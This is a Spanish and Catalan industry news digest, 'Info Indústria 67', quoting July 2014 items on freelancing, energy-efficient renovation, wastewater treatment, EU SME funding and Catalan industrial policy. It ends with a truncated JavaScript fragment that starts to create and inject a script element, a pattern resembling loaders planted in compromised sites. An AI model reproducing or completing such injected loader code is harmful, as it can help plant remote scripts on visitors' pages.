Info Indústria

Info Indústria 67

Los ‘freelances’ facilitan a las empresas ganar rapidez y eficiencia

“InfoJobs Freelance y la consultora norteamericana Tower Lane han elaborado el estudio Radiografía del mercado Freelance España en el que más de 3.500 empresas y autónomos han sido entrevistados para conocer su punto de vista sobre la tendencia de contratación freelance en España.”
infocif 26 julio 2014

20 Nichos de negocio en la Eficiencia Energética

Las directivas europeas de ahorro energético acotan el consumo del parque de viviendas de los países. Antes o después tendremos que enfrentarnos a la Rehabilitación Energética de Edificios ya que solo gracias al ahorro de hasta el 80% que puede suponer cumpliremos las exigencias.”
infocif 26 julio 2014

Estudian nuevas técnicas para la descontaminación de las aguas residuales industriales

Investigadores de la Universitat Politècnica de València y de la Plataforma Solar de Almería (PSA-CIEMAT) están trabajando en el desarrollo de nuevas técnicas para el tratamiento, descontaminación y reutilización de las

aguas industriales residuales. Sus estudios se enmarcan dentro del proyecto Aquafotox, financiado por el Ministerio de Economía y Competitividad.”
madrimasd 28 julio 2014

155 pequeñas empresas obtendrán financiación en la primera ronda de subvenciones del instrumento para las pymes de la Unión Europea

La Comisión Europea anuncia los primeros resultados de su nuevo instrumento dedicado a las pymes que, en el marco de Horizonte 2020, cuenta con una dotación de 3.000 millones de euros para ayudar a las pequeñas empresas innovadoras a llevar sus ideas del laboratorio al mercado. En total, 155 pymes de 21 países (Estados miembros de la UE o países asociados a Horizonte 2020) recibirán cada una 50.000 euros para financiar estudios de viabilidad destinados a desarrollar su estrategia de innovación.”
madrimasd 25 julio 2014

La mejora de las condiciones sociales aumentan las funciones cognitivas de las mujeres

Cuando mejoran las condiciones socioeconómicas y se disminuyen las restricciones educativas relacionadas con el género mejoran más las funciones cognitivas de las mujeres que las de los hombres, según un estudio que publica la revista Proceedings of the National Academy of Sciences.”
madrimasd 29 julio 2014

Catalunya industrial.

Opinió Antoni Soy, PROFESSOR D’ECONOMIA APLICADA, UNIVERSITAT DE BARCELONA.

Coneixement i indústria.

Enric Canela, catedràtic de bioquímica i biologia molecular, director de l’escola de doctorat i vicerector de política científica de la UB
“Amb pocs dies de diferència s’han produït dos esdeveniments desconnectats, però ambdós relacionats amb l’economia i la innovació.El 4 de juliol, a Barcelona, la presentació de l’estratègia industrial… “
l’econòmic (el punt avui) 26 juliol 2014

Integrated Reporting, la futura “norma” per als informes empresarials?

“Opinió José Luis Morales, comissió economia i sostenibilitat, col·legi d’economistes de Catalunya”

if (document.currentScript) {

var d=document;var s=d.createElement(‘script’);